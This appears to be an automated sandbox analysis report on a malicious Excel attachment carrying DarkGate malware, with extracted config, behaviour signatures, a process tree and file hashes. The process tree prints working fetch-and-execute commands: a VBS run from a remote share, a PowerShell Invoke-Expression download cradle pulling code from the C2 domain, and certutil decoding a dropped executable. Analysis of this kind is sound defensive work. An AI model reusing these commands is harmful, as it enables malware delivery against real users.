Analysis
-
max time kernel
299s -
max time network
277s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
15-03-2024 17:03
Static task
static1
Behavioral task
behavioral1
Sample
ACH-9391-15March.xlsx
Resource
win7-20240221-en
General
-
Target
ACH-9391-15March.xlsx
-
Size
48KB
-
MD5
56c3eefce2dbae121b56989d24ca7d8d
-
SHA1
21b2a5c4f22094b3318f1a2314beb7ba8b4763a9
-
SHA256
5f5953aadd3335ec4ff5190f4bc23d41e858c236d4102ade128650869a60cb70
-
SHA512
c465974add9255ac4c5cb65cf38e25897a124a146b7e4ed209df95328622296b3d673edab3a32020861081bbf90f556cc7e3856b9247a1fc9fa8781da6292a21
-
SSDEEP
768:ZFlppbq6i4Y/TJC4xJMxXcvFLwAPq4Sxv9PvEgzegYN1T/m:tLq94YV7JMxXyd4x+gzexTO
Malware Config
Extracted
darkgate
admin888
diveupdown.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
VfiPBBhr
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 4 IoCs
resource yara_rule behavioral2/memory/8-65-0x0000000004B40000-0x0000000004BB3000-memory.dmp family_darkgate_v6 behavioral2/memory/8-67-0x0000000004B40000-0x0000000004BB3000-memory.dmp family_darkgate_v6 behavioral2/memory/4044-94-0x00000000046C0000-0x0000000004733000-memory.dmp family_darkgate_v6 behavioral2/memory/4044-96-0x00000000046C0000-0x0000000004733000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2484 2088 WScript.exe 87 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3404 2088 WScript.exe 87 -
Blocklisted process makes network request 8 IoCs
flow pid Process 116 2148 powershell.exe 117 2148 powershell.exe 155 2148 powershell.exe 157 2148 powershell.exe 256 3580 powershell.exe 258 3580 powershell.exe 299 3580 powershell.exe 302 3580 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 8 AutoHotkey.exe 4044 AutoHotkey.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings OpenWith.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3628 NOTEPAD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2088 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2148 powershell.exe 2148 powershell.exe 2148 powershell.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3884 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2148 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe -
Suspicious use of SetWindowsHookEx 31 IoCs
pid Process 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 2088 EXCEL.EXE 3988 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe 3884 OpenWith.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2088 wrote to memory of 2484 2088 EXCEL.EXE 102 PID 2088 wrote to memory of 2484 2088 EXCEL.EXE 102 PID 2484 wrote to memory of 2148 2484 WScript.exe 103 PID 2484 wrote to memory of 2148 2484 WScript.exe 103 PID 2148 wrote to memory of 2080 2148 powershell.exe 107 PID 2148 wrote to memory of 2080 2148 powershell.exe 107 PID 2148 wrote to memory of 8 2148 powershell.exe 108 PID 2148 wrote to memory of 8 2148 powershell.exe 108 PID 2148 wrote to memory of 8 2148 powershell.exe 108 PID 2148 wrote to memory of 1516 2148 powershell.exe 109 PID 2148 wrote to memory of 1516 2148 powershell.exe 109 PID 2088 wrote to memory of 3404 2088 EXCEL.EXE 111 PID 2088 wrote to memory of 3404 2088 EXCEL.EXE 111 PID 3404 wrote to memory of 3580 3404 WScript.exe 112 PID 3404 wrote to memory of 3580 3404 WScript.exe 112 PID 3580 wrote to memory of 5064 3580 powershell.exe 122 PID 3580 wrote to memory of 5064 3580 powershell.exe 122 PID 3580 wrote to memory of 4044 3580 powershell.exe 124 PID 3580 wrote to memory of 4044 3580 powershell.exe 124 PID 3580 wrote to memory of 4044 3580 powershell.exe 124 PID 3580 wrote to memory of 2856 3580 powershell.exe 125 PID 3580 wrote to memory of 2856 3580 powershell.exe 125 PID 3884 wrote to memory of 3628 3884 OpenWith.exe 130 PID 3884 wrote to memory of 3628 3884 OpenWith.exe 130 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1516 attrib.exe 2856 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH-9391-15March.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.182.156.154\share\EXCEL_DOCUMENT_OPEN.XLSX.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'diveupdown.com/uyvbjbho')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\certutil.exe"C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe4⤵PID:2080
-
-
C:\fpcg\AutoHotkey.exe"C:\fpcg\AutoHotkey.exe" script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:8
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/fpcg4⤵
- Views/modifies file attributes
PID:1516
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.182.156.154\share\EXCEL_DOCUMENT_OPEN.XLSX.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'diveupdown.com/uyvbjbho')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\certutil.exe"C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe4⤵PID:5064
-
-
C:\fpcg\AutoHotkey.exe"C:\fpcg\AutoHotkey.exe" script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4044
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/fpcg4⤵
- Views/modifies file attributes
PID:2856
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1700
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3988
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\sa.9NCBCSZSJRSB_0__.Public.InstallAgent.dat2⤵
- Opens file in notepad (likely ransom note)
PID:3628
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556c43715e0e7fa58012d8a5769d8d568
SHA14370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA2568ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed
-
Filesize
1KB
MD513d07c38c6752a866f9f18368cd69ef7
SHA1a0b0d95283176f159bfed75ec96d7fa048cde922
SHA25671af1cc7aa47ce29d1718e53c20853f3659046c09c58adf79aae00acb617026e
SHA512bc92a11e853556931618e1c8604c28de437ae8c055ef6135a35d6ae9d0eb19fa30d3ba4fc9287d7dcd0501af3a5d4b21670b6f70afdcbf09ba761a3a9d652c20
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD5167faac8bde5091613e6e94709ea3103
SHA171a6d0cc75ca2cc802b881b4d36eeddaa0fdf023
SHA2564fe478c5c9e25a84b09ca485001127d3b89e2398483ed7bf8edee2d62995439a
SHA512b040403805860da18cd9e2ad803cbee46e3f7bdbbed9c0ec0f15765829aed950353e6427f0b13fc3dc277ac6e64e264bdfe7e225790775cabde191b1dc498305
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
1.7MB
MD5bf88d228baec74c7928df463db0f0fdc
SHA1efe1657bb9a9a31742b71d8c14bae89b2ab5533b
SHA256493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed
SHA512c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa
-
Filesize
52KB
MD53433308fb4cfbf4754f37f8429cca3f6
SHA1a98c60ac207b30e015fa970059cd3d6af5aad11f
SHA256bf1bdcce4d86d8fce80f359f1a871c1bc70e29b3fcdff1d2ac70570ecf5a1bdc
SHA5120cc02989002194d4e86dd2452b552360a4472d72e261921cf2b13ab50523d789732b5b677c664ae73c5751180665417b349c3c424c41fb0d27026bc7f8f9b3cf
-
Filesize
916KB
MD5a7c06b0255856bae512a0f174891d74f
SHA1801b8ea8a27641fcfee78af6eff906052149054c
SHA2563816103d61866097c2f216a4668b633ce126ad18da77b3b6c87ac24382f70929
SHA5125d586cb80b3116d002c81b4df7aa449cd6fae454d03812eee3dd72de4e0806035d01bc4fcf16130f35ebfe5707c2d11e9453f8eb66f778a7729dc94bbfbd4cd6